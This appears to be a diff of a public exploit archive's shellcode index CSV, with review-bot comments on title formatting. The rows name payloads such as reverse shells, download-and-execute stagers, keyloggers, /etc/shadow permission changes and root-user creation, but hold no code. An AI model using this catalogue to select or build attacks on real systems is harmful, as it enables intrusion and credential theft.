36359,shellcodes/linux_x86-64/36359.c,"Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)",2014-03-27,"Chris Higgins",shellcode,linux_x86-64
36391,shellcodes/linux_x86/36391.c,"Linux/x86 - execve(/bin/sh) ROT13 Encoded Shellcode (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36393,shellcodes/linux_x86/36393.c,"Linux/x86 - chmod 0777 /etc/shadow + Obfuscated Shellcode (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36394,shellcodes/linux_x86/36394.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36395,shellcodes/linux_x86/36395.c,"Linux/x86 - execve(/bin/sh) + Obfuscated Shellcode (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36397,shellcodes/linux_x86/36397.c,"Linux/x86 - Reverse TCP (192.168.1.133:33333/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36398,shellcodes/linux_x86/36398.c,"Linux/x86 - Bind TCP (33333/TCP) Shell (/bin/sh) Shellcode (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",shellcode,linux_x86
36637,shellcodes/linux_x86/36637.c,"Linux/x86 - Disable ASLR Security Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36672,shellcodes/linux_x86/36672.asm,"Linux/x86 - Egghunter (0x5159) Shellcode (20 bytes)",2015-04-08,"Paw Petersen",shellcode,linux_x86
36673,shellcodes/generator/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",shellcode,generator
36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
36701,shellcodes/linux_x86/36701.c,"Linux/x86 - Create 'my.txt' In Working Directory Shellcode (37 bytes)",2015-04-10,"Mohammad Reza Ramezani",shellcode,linux_x86
36750,shellcodes/linux_x86/36750.c,"Linux/x86 - setreuid(0_ 0) + execve(/sbin/halt) + exit(0) Shellcode (49 bytes)",2015-04-14,"Febriyanto Nugroho",shellcode,linux_x86
36778,shellcodes/linux_x86/36778.c,"Linux/x86 - execve(/bin/sh) Shellcode (35 bytes)",2015-04-17,"Mohammad Reza Espargham",shellcode,linux_x86
36779,shellcodes/windows_x86/36779.c,"Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36780,shellcodes/windows_x86/36780.c,"Windows XP SP3 x86 - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36779,shellcodes/windows_x86/36779.c,"Windows/x86 (XP SP3) - Create (file.txt) Shellcode (83 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36780,shellcodes/windows_x86/36780.c,"Windows/x86 (XP SP3) - Restart Shellcode (57 bytes)",2015-04-17,"TUNISIAN CYBER",shellcode,windows_x86
36781,shellcodes/generator/36781.py,"Linux/x86 - 'Followtheleader' Custom execve() Shellcode (Encoder/Decoder) (Generator)",2015-04-17,"Konstantinos Alexiou",shellcode,generator
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) (Push Method) Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36857,shellcodes/linux_x86/36857.c,"Linux/x86 - execve(/bin/sh) + Push Method Shellcode (21 bytes)",2015-04-29,noviceflux,shellcode,linux_x86
36858,shellcodes/linux_x86-64/36858.c,"Linux/x86-64 - execve(/bin/sh) Via Push Shellcode (23 bytes)",2015-04-29,noviceflux,shellcode,linux_x86-64
36921,shellcodes/linux_x86/36921.c,"Linux/x86 - Bind TCP (17771/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (58 bytes)",2015-05-06,"Oleg Boytsev",shellcode,linux_x86
36908,shellcodes/linux_x86/36908.c,"Linux/x86 - exit(0) Shellcode (6 bytes)",2015-05-04,"Febriyanto Nugroho",shellcode,linux_x86
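Review bot: the `+` separator is added to 36393 and 36395 (`+ Obfuscated Shellcode`) but the rows left unchanged between and around them still use the old form: 36394 `In /etc/hosts Obfuscated Shellcode`, 34592 `Execute /bin/bash Obfuscated Shellcode` and 36391 `execve(/bin/sh) ROT13 Encoded Shellcode`. Update those in the same pass so the convention holds across the file. The platform prefix also needs a second look: 24318 becomes `Windows/x86-64 / x86 (2000/XP/7)`, which matches no other row's format, and 36411 now reads `Execute Shellcode Using Powershell (Generator)`, placing the technique after the word `Shellcode` where every other title places it before.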
@ -504,22 +504,22 @@ id,file,description,date,author,type,platform
37297,shellcodes/linux_x86/37297.txt,"Linux/x86 - Read /etc/passwd Shellcode (58 bytes)",2015-06-16,B3mB4m,shellcode,linux_x86
37358,shellcodes/linux_x86/37358.c,"Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37359,shellcodes/linux_x86/37359.c,"Linux/x86 - Bind TCP (5555/TCP) Netcat Shell Shellcode (60 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37362,shellcodes/linux_x86-64/37362.c,"Linux/x86-64 - execve(/bin/sh) + Null-Free Shellcode (30 bytes)",2015-06-24,"Bill Borskey",shellcode,linux_x86-64
37365,shellcodes/linux_x86/37365.c,"Linux/x86 - Download File + Execute Shellcode",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37366,shellcodes/linux_x86/37366.c,"Linux/x86 - Reboot() Shellcode (28 bytes)",2015-06-24,B3mB4m,shellcode,linux_x86
37384,shellcodes/linux_x86/37384.c,"Linux/x86 - execve(/bin/sh) Shellcode (23 bytes) (1)",2015-06-26,"Bill Borskey",shellcode,linux_x86
37390,shellcodes/linux_x86/37390.asm,"Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37391,shellcodes/linux_x86/37391.asm,"Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37392,shellcodes/linux_x86/37392.asm,"Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37393,shellcodes/linux_x86/37393.asm,"Linux/x86 - exec /bin/dash Shellcode (45 bytes)",2015-06-26,"Mohammad Reza Espargham",shellcode,linux_x86
37401,shellcodes/linux_x86-64/37401.asm,"Linux/x86-64 - execve() Encoded Shellcode (57 bytes)",2015-06-27,"Bill Borskey",shellcode,linux_x86-64
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows 2003 x64 - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
37495,shellcodes/linux_x86/37495.py,"Linux/x86 - execve(/bin/sh) + ROT7 Encoded Shellcode",2015-07-05,"Artem T",shellcode,linux_x86
37664,shellcodes/windows_x86/37664.c,"Windows/x86 (XP SP3) (Turkish) - MessageBox Shellcode (24 bytes)",2015-07-21,B3mB4m,shellcode,windows_x86
37749,shellcodes/linux_x86/37749.c,"Linux/x86 - Egghunter (0x50905090) Without Hardcoded Signature Shellcode (19 bytes)",2015-08-10,"Guillaume Kaddouch",shellcode,linux_x86
37758,shellcodes/windows_x86/37758.c,"Windows/x86 - user32!MessageBox _Hello World!_ + Null-Free Shellcode (199 bytes)",2015-08-12,noviceflux,shellcode,windows_x86
37762,shellcodes/linux_x86/37762.py,"Linux/x86 - execve(/bin/sh) + ROL/ROR Encoded Shellcode",2015-08-12,"Anastasios Monachos",shellcode,linux_x86
37895,shellcodes/windows_x86-64/37895.asm,"Windows/x86-64 (2003) - Token Stealing Shellcode (59 bytes)",2015-08-20,"Fitzl Csaba",shellcode,windows_x86-64
38065,shellcodes/osx/38065.txt,"OSX/x86-64 - execve(/bin/sh) + Null-Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",shellcode,osx
38075,shellcodes/system_z/38075.txt,"Mainframe/System Z - Bind TCP (12345/TCP) Shell + Null-Free Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",shellcode,system_z
38088,shellcodes/linux_x86/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",shellcode,linux_x86
38094,shellcodes/generator/38094.c,"Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)",2015-09-07,"Ajith Kp",shellcode,generator
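Review bot: The new 37758 title still carries the underscore placeholders in 'user32!MessageBox _Hello World!_', while the same commit strips them from 'system(_systeminfo_)' (39914) and 'rmdir(_/tmp/willdeleted_)' (43691); use one form throughout. Also, the new 37749 title 'Egghunter (0x50905090) Without Hardcoded Signature' names a signature and denies one in the same phrase; if the value is built at run time, say so in the title.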
@ -529,16 +529,16 @@ id,file,description,date,author,type,platform
38194,shellcodes/android/38194.c,"Google Android - Bind TCP (1035/TCP) Telnetd Shell + Environment/Parameters Shellcode (248 bytes)",2015-09-15,"Steven Padilla",shellcode,android
38239,shellcodes/linux_x86-64/38239.asm,"Linux/x86-64 - execve() Shellcode (22 bytes)",2015-09-18,d4sh&r,shellcode,linux_x86-64
38469,shellcodes/linux_x86-64/38469.c,"Linux/x86-64 - Bind TCP (31173/TCP) Shell (/bin/sh) + Password (1234) Shellcode (92 bytes)",2015-10-15,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38708,shellcodes/linux_x86-64/38708.asm,"Linux/x86-64 - Egghunter (0x6b634068) Shellcode (24 bytes)",2015-11-16,d4sh&r,shellcode,linux_x86-64
38815,shellcodes/linux_x86-64/38815.c,"Linux/x86-64 - execve() + Polymorphic Shellcode (31 bytes)",2015-11-25,d4sh&r,shellcode,linux_x86-64
38959,shellcodes/generator/38959.py,"Windows XP < 10 - Command Generator WinExec Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
38959,shellcodes/generator/38959.py,"Windows (XP < 10) - Command Generator WinExec + Null-Free Shellcode (Generator)",2015-12-13,B3mB4m,shellcode,generator
39149,shellcodes/linux_x86-64/39149.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2016-01-01,Scorpion_,shellcode,linux_x86-64
39152,shellcodes/linux_x86-64/39152.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)",2016-01-02,"Sathish kumar",shellcode,linux_x86-64
39160,shellcodes/linux_x86/39160.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes) (1)",2016-01-04,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39185,shellcodes/linux_x86-64/39185.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)",2016-01-06,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39203,shellcodes/linux_x86-64/39203.c,"Linux/x86-64 - Egghunter (0x50905090) Shellcode (18 bytes)",2016-01-08,"Sathish kumar",shellcode,linux_x86-64
39204,shellcodes/linux_x86/39204.c,"Linux/x86 - Egghunter (0x4f904790) Shellcode (13 bytes)",2016-01-08,"Dennis 'dhn' Herrmann",shellcode,linux_x86
39312,shellcodes/linux_x86-64/39312.c,"Linux/x86-64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)",2016-01-25,"Sathish kumar",shellcode,linux_x86-64
39336,shellcodes/linux/39336.c,"Linux x86/x86-64 - Reverse TCP (192.168.1.29:4444/TCP) Shell Shellcode (195 bytes)",2016-01-27,B3mB4m,shellcode,linux
39337,shellcodes/linux/39337.c,"Linux x86/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (251 bytes)",2016-01-27,B3mB4m,shellcode,linux
39338,shellcodes/linux/39338.c,"Linux x86/x86-64 - Read /etc/passwd Shellcode (156 bytes)",2016-01-27,B3mB4m,shellcode,linux
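Review bot: The egg values added to the titles of 38708, 39203 and 39204 (0x6b634068, 0x50905090, 0x4f904790) cannot be checked from this CSV alone; confirm each against its source file before merging, since anyone searching the index by marker will rely on them. Style point on 38959: 'Windows (XP < 10)' reads as a comparison rather than a version range, and the trailing context rows 39336 to 39338 still use 'Linux x86/x86-64' instead of the slash form applied elsewhere.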
@ -547,7 +547,7 @@ id,file,description,date,author,type,platform
39389,shellcodes/linux_x86/39389.c,"Linux/x86 - Download File + Execute Shellcode (135 bytes)",2016-02-01,B3mB4m,shellcode,linux_x86
39390,shellcodes/linux_x86-64/39390.c,"Linux/x86-64 - execve() Stack + Polymorphic Shellcode (47 bytes)",2016-02-01,"Sathish kumar",shellcode,linux_x86-64
39496,shellcodes/arm/39496.c,"Linux/ARM - Reverse TCP (10.0.0.10:1337/TCP) Shell (/bin/sh) Shellcode (95 bytes)",2016-02-26,Xeon,shellcode,arm
39519,shellcodes/windows_x86/39519.c,"Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39519,shellcodes/windows_x86/39519.c,"Windows/x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes)",2016-03-02,"Sean Dillon",shellcode,windows_x86
39578,shellcodes/linux_x86-64/39578.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:1234/TCP) Shell Shellcode (134 bytes)",2016-03-21,"Sudhanshu Chauhan",shellcode,linux_x86-64
39617,shellcodes/linux_x86-64/39617.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (26 bytes)",2016-03-24,"Ajith Kp",shellcode,linux_x86-64
39624,shellcodes/linux_x86-64/39624.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (25 bytes) (1)",2016-03-28,"Ajith Kp",shellcode,linux_x86-64
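Review bot: The 39519 rename is only half of the normalisation: the platform becomes 'Windows/x86', but 'Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode' is left without the '+' separator that this commit adds before 'Null-Free' on 37362, 37758, 38065 and 38959. Suggest '... (//192.168.1.19/c) + Null-Free Shellcode (96 bytes)'.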
@ -555,25 +555,25 @@ id,file,description,date,author,type,platform
39684,shellcodes/linux_x86-64/39684.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (81 bytes)",2016-04-11,"Ajith Kp",shellcode,linux_x86-64
39700,shellcodes/linux_x86-64/39700.c,"Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes)",2016-04-15,"Ajith Kp",shellcode,linux_x86-64
39718,shellcodes/linux_x86-64/39718.c,"Linux/x86-64 - Bind TCP (5600/TCP) Shell Shellcode (86 bytes)",2016-04-21,"Ajith Kp",shellcode,linux_x86-64
40094,shellcodes/windows_x86/40094.c,"Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40094,shellcodes/windows_x86/40094.c,"Windows/x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39722,shellcodes/linux_x86/39722.c,"Linux/x86 - Reverse TCP (::ffff:192.168.64.129:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (159 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39723,shellcodes/linux_x86/39723.c,"Linux/x86 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (1250 bytes)",2016-04-25,"Roziul Hasan Khan Shifat",shellcode,linux_x86
39728,shellcodes/generator/39728.py,"Linux/x86-64 - Bind TCP Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",shellcode,generator
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows .Net Framework x86 - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39731,shellcodes/windows/39731.c,"Windows - Keylogger to File (./log.bin) + Null-Free Shellcode (431 bytes)",2016-04-25,Fugu,shellcode,windows
39754,shellcodes/windows_x86/39754.txt,"Windows/x86 (.Net Framework) - Execute Native x86 Shellcode",2016-05-02,Jacky5112,shellcode,windows_x86
39758,shellcodes/linux_x86-64/39758.c,"Linux/x86-64 - Bind TCP (1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (199 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39763,shellcodes/linux_x86-64/39763.c,"Linux/x86-64 - Reverse TCP (192.168.209.131:1472/TCP) Shell (/bin/sh) + IPv6 Shellcode (203 bytes)",2016-05-04,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39794,shellcodes/windows/39794.c,"Windows - Keylogger to File (%TEMP%/log.bin) + Null-Free Shellcode (601 bytes)",2016-05-10,Fugu,shellcode,windows
39815,shellcodes/generator/39815.c,"Linux/x86 - Bind TCP (1234/TCP) Shell (/bin/sh) Shellcode (87 bytes) (Generator)",2016-05-16,JollyFrogs,shellcode,generator
39847,shellcodes/linux_x86-64/39847.c,"Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)",2016-05-23,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39851,shellcodes/linux_x86/39851.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/bash) Shellcode (656 bytes)",2016-05-25,"Brandon Dennis",shellcode,linux_x86
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39869,shellcodes/linux_x86-64/39869.c,"Linux/x86-64 - execve() + XOR Encoded Shellcode (84 bytes)",2016-05-30,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,shellcode,multiple
39900,shellcodes/windows_x86/39900.c,"Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39900,shellcodes/windows_x86/39900.c,"Windows/x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes)",2016-06-07,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39901,shellcodes/linux_x86/39901.c,"Linux/x86 - Bind TCP (13337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (56 bytes)",2016-06-07,sajith,shellcode,linux_x86
39914,shellcodes/windows_x86/39914.c,"Windows x86 - system(_systeminfo_) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows XP < 10 - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39914,shellcodes/windows_x86/39914.c,"Windows/x86 - system(systeminfo) Shellcode (224 bytes)",2016-06-10,"Roziul Hasan Khan Shifat",shellcode,windows_x86
39979,shellcodes/windows/39979.c,"Windows (XP < 10) - Download File + Execute Shellcode",2016-06-20,B3mB4m,shellcode,windows
40005,shellcodes/windows_x86/40005.c,"Windows/x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes)",2016-06-22,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40026,shellcodes/linux_x86/40026.txt,"Linux/x86 - execve(/bin/sh) + ASLR Bruteforce Shellcode",2016-06-27,"Pawan Lal",shellcode,linux_x86
40029,shellcodes/linux_x86-64/40029.c,"Linux/x86-64 - Reverse TCP (192.168.86.128:1472/TCP) cat /etc/passwd Shellcode (164 bytes)",2016-06-28,"Roziul Hasan Khan Shifat",shellcode,linux_x86-64
40052,shellcodes/linux_x86-64/40052.c,"Linux/x86-64 - Bind TCP Netcat Shell + Null-Free Shellcode (64 bytes)",2016-07-04,Kyzer,shellcode,linux_x86-64
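Review bot: The underscore clean-up is inconsistent within this hunk: 39914 goes from 'system(_systeminfo_)' to 'system(systeminfo)', but the new rows for 39900 and 40005 keep 'WinExec(_cmd.exe__0)' and 'ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1)'. In those two the underscore stands for both the quote and the comma, so decide which of the two meanings is being dropped and apply it to all three rows.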
@ -581,26 +581,26 @@ id,file,description,date,author,type,platform
40061,shellcodes/linux_x86-64/40061.c,"Linux/x86-64 - Bind TCP (4442/TCP) Ncat Shell + SSL + Multi-Channel (4444-4447/TCP) + Persistant + fork() + IPv4/6 + Password + Null-Free Shellcode (176 bytes)",2016-07-06,Kyzer,shellcode,linux_x86-64
40075,shellcodes/linux_x86/40075.c,"Linux/x86 - Reverse TCP (192.168.227.129:4444/TCP) Shell (/bin/sh) Shellcode (75 bytes)",2016-07-08,sajith,shellcode,linux_x86
40079,shellcodes/linux_x86-64/40079.c,"Linux/x86-64 - Reverse TCP (10.1.1.4/TCP) Shell + Continuously Probing via Socket + Port-Range (391-399) + Password (la crips) + Null-Free Shellcode (172 bytes)",2016-07-11,Kyzer,shellcode,linux_x86-64
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40110,shellcodes/linux_x86/40110.c,"Linux/x86 - Reverse TCP (127.1.1.1:10) Xterm Shell Shellcode (68 bytes)",2016-07-13,RTV,shellcode,linux_x86
40122,shellcodes/linux_x86-64/40122.txt,"Linux/x86-64 - Bind TCP (4442/TCP) Shell + Syscall Persistent + Multi-Terminal/Port-Range (4444-4447/TCP) + Password (la crips) + Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,shellcode,linux_x86-64
40128,shellcodes/linux_crisv32/40128.c,"Linux/CRISv32 Axis Communication - Reverse TCP (192.168.57.1:443/TCP) Shell (/bin/sh) Shellcode (189 bytes)",2016-07-20,bashis,shellcode,linux_crisv32
40131,shellcodes/linux_x86/40131.c,"Linux/x86 - execve(/bin/sh) Shellcode (19 bytes)",2016-07-20,sajith,shellcode,linux_x86
40139,shellcodes/linux_x86-64/40139.c,"Linux/x86-64 - Reverse TCP (10.1.1.4:46357/TCP) Shell + Subtle Probing + Timer + Burst + Password (la crips) + Multi-Terminal Shellcode (84/122/172 bytes)",2016-07-21,Kyzer,shellcode,linux_x86-64
40175,shellcodes/windows_x86/40175.c,"Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40175,shellcodes/windows_x86/40175.c,"Windows/x86 (7) - localhost Port Scanner Shellcode (556 bytes)",2016-07-29,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40179,shellcodes/linux_x86/40179.c,"Linux/x86 - Bind TCP/UDP (98/TCP + UDP) Netcat Shell Shellcode (44/52 bytes)",2016-07-29,Kyzer,shellcode,linux_x86
40222,shellcodes/linux_x86/40222.c,"Linux/x86 - Bind TCP (9090/TCP) Shell (/bin/zsh) Shellcode (96 bytes)",2016-08-10,thryb,shellcode,linux_x86
40223,shellcodes/linux_x86/40223.c,"Linux/x86 - Reverse TCP (127.255.255.254:9090/TCP) Shell (/bin/zsh) Shellcode (80 bytes)",2016-08-10,thryb,shellcode,linux_x86
40245,shellcodes/windows_x86/40245.c,"Windows x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{shadow_passwd} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{shadow_passwd} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
40245,shellcodes/windows_x86/40245.c,"Windows/x86 - MessageBoxA Shellcode (242 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40246,shellcodes/windows_x86/40246.c,"Windows/x86 - CreateProcessA cmd.exe Shellcode (253 bytes)",2016-08-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86
40259,shellcodes/windows_x86/40259.c,"Windows/x86 - InitiateSystemShutdownA() Shellcode (599 bytes)",2016-08-18,"Roziul Hasan Khan Shifat",shellcode,windows_x86
43562,shellcodes/linux_x86-64/43562.c,"Linux/x86-64 - Bind TCP (4444/TCP) + Stager + Egghunter (0x64616564) Shellcode (157 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43563,shellcodes/linux_x86-64/43563.c,"Linux/x86-64 - Add User (pwned/$pass$) Using open_write_close To /etc/{passwd_shadow} Shellcode (358 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43564,shellcodes/linux_x86-64/43564.c,"Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd To /etc/{passwd_shadow} Shellcode (273 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
43565,shellcodes/linux_x86-64/43565.asm,"Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)",2009-01-01,Mr.Un1k0d3r,shellcode,linux_x86-64
43566,shellcodes/linux_x86-64/43566.asm,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)",2009-01-01,"Christophe G",shellcode,linux_x86-64
